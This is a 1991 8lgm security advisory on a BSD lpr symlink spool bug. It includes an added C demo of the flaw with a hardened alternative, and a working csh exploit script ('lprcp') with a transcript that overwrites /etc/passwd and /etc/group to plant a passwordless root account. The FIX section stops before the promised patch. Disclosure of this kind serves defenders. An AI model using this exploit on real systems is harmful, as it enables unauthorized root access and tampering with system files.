
Overwrite files with bug in lpr in BSD


[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991

PROGRAM:

 lpr(1)  (/usr/ucb/lpr or /usr/bin/lpr)

VULNERABLE OS's:

 SunOS 4.1.1 or earlier
 BSD 4.3
 BSD NET/2 Derived Systems
 A/UX 2.0.1

 Most systems supporting the BSD LP subsystem


DESCRIPTION:

 lpr(1) can be used to overwrite or create (and become owner of)
 any file on the system.  lpr -s allows users to create symbolic
 links in lpd's spool directory (typically /var/spool/lpd).
 Spool file names carry a three-digit job sequence number, so
 after 1000 invocations of lpr the same filename is reused, and
 lpr follows the link previously installed under that name.  It
 will thus overwrite or create any file that this link points to.
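
 The following C program is an added illustration; it is not part
 of the 8lgm advisory and is not lpr's source.  It models the
 mechanism described above inside a scratch directory made with
 mkdtemp(): a spool entry named like lpr's dfA<seq><host> files is
 planted as a link, the sequence counter wraps after 1000 jobs, and
 a create-and-write on the reused name goes through the link.  The
 target file, the .tmp name, the hostname "testnode" and the start
 sequence 60 are constructed for the demo.  spool_write_safe() is
 one possible hardening of the write, not the vendor's patch.

```c
/* Added example: models the lpr -s spool-link bug, not lpr source code. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The job number in the spool's .seq file is three digits: it wraps at 1000. */
int next_seq(int seq) { return (seq + 1) % 1000; }

/* Builds e.g. "/var/spool/lpd/cfA060testnode"; type is 'c' (control) or 'd' (data). */
void spool_name(char *buf, size_t n, const char *dir, char type, int seq,
                const char *host) {
    snprintf(buf, n, "%s/%cfA%03d%s", dir, type, seq, host);
}

/* Vulnerable pattern: O_CREAT|O_TRUNC follows whatever the name points at. */
int spool_write_naive(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    int ok = write(fd, data, strlen(data)) == (ssize_t)strlen(data);
    close(fd);
    return ok ? 0 : -1;
}

/* Hardened pattern (assumed mitigation, not the vendor fix): the entry must be
 * created by us (O_EXCL) and a link in the final component is never followed
 * (O_NOFOLLOW).  A name already taken by a planted link fails with EEXIST. */
int spool_write_safe(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    int ok = write(fd, data, strlen(data)) == (ssize_t)strlen(data);
    close(fd);
    return ok ? 0 : -1;
}

static int file_contains(const char *path, const char *needle) {
    char buf[256] = {0};
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = 0;
    return strstr(buf, needle) != NULL;
}

/* Bit 0: the naive writer overwrote the target through the planted link.
 * Bit 1: the hardened writer refused the reused name.  Returns -1 on setup error. */
int run_demo(void) {
    char dir[] = "/tmp/lprdemo.XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char target[512], tmp[512], df[512], again[512];
    snprintf(target, sizeof target, "%s/group", dir); /* stands in for /etc/group */
    snprintf(tmp, sizeof tmp, "%s/.tmp.4242", dir);   /* stands in for /tmp/.tmp.$$ */
    if (spool_write_safe(target, "wheel:*:0:root,operator\n") != 0) return -1;
    if (spool_write_safe(tmp, "x\n") != 0) return -1;

    int seq = 60;
    spool_name(df, sizeof df, dir, 'd', seq, "testnode");
    if (symlink(tmp, df) != 0) return -1;     /* 1. lpr -q -s: df entry links to the user's file */
    unlink(tmp);                              /* 2. user removes the file ...              */
    if (symlink(target, tmp) != 0) return -1; /*    ... and re-points the name at the target */
    for (int i = 0; i < 1000; i++) seq = next_seq(seq); /* 3. 1000 jobs later ...     */
    spool_name(again, sizeof again, dir, 'd', seq, "testnode");
    if (strcmp(df, again) != 0) return -1;    /*    ... the same df name comes round again   */

    int result = 0;
    /* 4. lpr copies the submitted file into "its" spool entry, through both links */
    if (spool_write_naive(again, "wheel:*:0:root,operator,8lgm\n") == 0 &&
        file_contains(target, ",8lgm"))
        result |= 1;
    if (spool_write_safe(again, "harmless\n") != 0 && errno == EEXIST)
        result |= 2;

    unlink(df); unlink(tmp); unlink(target); rmdir(dir);
    return result;
}

int main(void) {
    int r = run_demo();
    printf("naive writer followed the planted link: %s\n", (r & 1) ? "yes" : "no");
    printf("hardened writer refused the reused name: %s\n", (r & 2) ? "yes" : "no");
    return r == 3 ? 0 : 1;
}
```

 The naive writer is the whole bug in two calls: the name is
 trusted because lpr "owns" the spool directory, yet the entry under
 that name was installed by the user a thousand jobs earlier.  Note
 that lpr also chowns the spool file to the submitting user, which
 is why the advisory's victim files end up owned by 8lgm.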

IMPACT:

 Any user with access to lpr(1) can alter system files and thus
 become root.

REPEAT BY:

 This example demonstrates how to become root on most affected
 machines by modifying /etc/passwd and /etc/group.  Please do
 not do this unless you have permission.

 Create the following script, 'lprcp':

8<--------------------------- cut here ----------------------------
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#

if ($#argv != 2) then
 echo Usage: lprcp from-file to-file
 exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$  # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$  # to where we really want

@ s = 0
while ( $s != 999)  # loop 999 times
 lpr /nofile >&/dev/null # no such file, but each call still uses up a sequence number
 @ s++
 if ( $s % 10 == 0 ) echo -n .
end
lpr $1    # incoming file
    # user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------

 (Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:
> % id
 uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
 /tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
 /tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
 /tmp/group: unmodified: line 49
> :/wheel
 wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
 /tmp/group: 49 lines, 944 characters.

Install our new files:
> % ./lprcp /tmp/group /etc/group
 ................................................................
 ...................................
 lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
 .................................................................
 ..................................
 lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:
> % ls -l /etc/passwd /etc/group
 -rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
 -rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
> % head -1 /etc/group
 wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:
> % su 8lgmroot
 # chown root /etc/passwd /etc/group
 # rm -f /tmp/passwd /tmp/group
 #

FIX:

 1. Contact your vendor for a fix.
 2. In the meantime, apply the following patch, derived from
    BSD NET/2 source, which will correct the flaw on most
    affected systems:

